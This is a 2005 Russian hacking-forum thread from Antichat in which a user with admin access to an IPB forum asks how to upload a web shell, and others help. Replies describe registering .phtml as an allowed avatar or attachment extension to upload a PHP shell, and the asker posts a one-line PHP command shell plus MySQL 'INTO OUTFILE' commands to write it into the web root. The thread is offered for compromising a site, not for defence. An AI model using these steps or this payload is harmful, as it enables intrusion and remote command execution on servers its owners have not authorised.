ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлом ipb через админку
  #1  
Старый 09.12.2005, 02:04
Аватар для fixer2
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
Провел на форуме:
41499

Репутация: 1
Arrow Взлом ipb через админку

Честно и старательно провел 20 минут в поисках похожих тем, но ничего полезного не нашел.

Есть нормальный доступ к админской панели, нужно всего лишь залить шелл на сайт. Uploads доступен на запись, закачать в папку со смайлами удается, но прочитать - нет(АшиПка 500).

Я читал эту статью, но тамошний вариант с подменой запроса не работает - файл не передается. Прошу помочь. Устроит любой вариант, главное - шелл залить.
 
Ответить с цитированием

  #2  
Старый 09.12.2005, 19:09
Аватар для Barsik
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790

Репутация: 726
Отправить сообщение для Barsik с помощью ICQ Отправить сообщение для Barsik с помощью MSN
По умолчанию

Какой версии форум?
 
Ответить с цитированием

  #3  
Старый 09.12.2005, 22:11
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

 
Ответить с цитированием

  #4  
Старый 10.12.2005, 01:55
Аватар для fixer2
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
Провел на форуме:
41499

Репутация: 1
По умолчанию

to Barsik
ipb 1.3 final


to Green_Bear
Попробовал как ты написал. Результат:
Цитата:
запрещено загружать файлы такого типа, в качестве аватаров или фотографий

Последний раз редактировалось fixer2; 10.12.2005 в 02:07..
 
Ответить с цитированием

  #5  
Старый 10.12.2005, 04:49
Аватар для fixer2
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
Провел на форуме:
41499

Репутация: 1
По умолчанию

Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.

Последний раз редактировалось fixer2; 10.12.2005 в 05:49..
 
Ответить с цитированием

  #6  
Старый 10.12.2005, 22:09
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.
Юзай поиск тема обсуждалась( into outfile)
Если вопрос не закрыт то иди сюда(лучшие доки) - http://dev.mysql.com/doc/
 
Ответить с цитированием

  #7  
Старый 10.12.2005, 23:11
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Делай так: Если форум IPB 2 0 4.

Зайди в Админку,

Системные настройки---->Главная конфигурация---->Профили пользователей---->Разрешенные расширения файлов для аватар.

Ставиш разширение phtml.

Это тоже самое что и php, потом идёш в Аттачи и делаеш тама ешё один тип-.phtml, тип пишем от пхп файлов, то есть application/octet-stream после всего это идёш и грузиш свой шелл , только с изменёным разширением в phtml, потом смотриш его свойства вот и всё, можна сказать я тебе на пальчиках всё обяснил,вчера темже способом Грин для меня шелл закинул.

Если я помог тебе не забудь про репутацию Грину и мне.

Респект Грину за выложеную инфу.

Последний раз редактировалось Tem; 10.12.2005 в 23:18..
 
Ответить с цитированием

  #8  
Старый 11.12.2005, 03:06
Аватар для fixer2
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
Провел на форуме:
41499

Репутация: 1
По умолчанию

to Tem
Читай топ внимательнее.

to qBiN
Спасибо за инфу, но все равно пока не получается...

Последний раз редактировалось fixer2; 11.12.2005 в 08:18..
 
Ответить с цитированием

  #9  
Старый 11.12.2005, 08:22
Аватар для fixer2
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
Провел на форуме:
41499

Репутация: 1
По умолчанию

Значит прочел-таки я это небольшое пособие. Как выяснилось - в мускуле сложных команд нету. Тем не менее залить шелл не удается.

Сначала я собственно создал значение в таблице юзеров:
Цитата:
INSERT INTO table (par1, par2) VALUES ('7777','<? system($_GET["cmd"]); ?> ')
Теперь инто файл хочу его залить:
Цитата:
SELECТ name FROM table INTO OUTFILE '/home/user/www/shell.php'
Но, увы, не получается. В ответ вижу следующее сообщение:

Цитата:
Access denied for user: 'forum@localhost' (Using password: YES)
Это означает что инто аутфайл запрещен? Какие тогда варианты есть?

Последний раз редактировалось fixer2; 11.12.2005 в 08:35..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
Взлом сервера Microsoft IIS 6 Через SQL Запросы [Tsh] *CorPSe* АнтиАдмин 3 08.03.2005 12:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ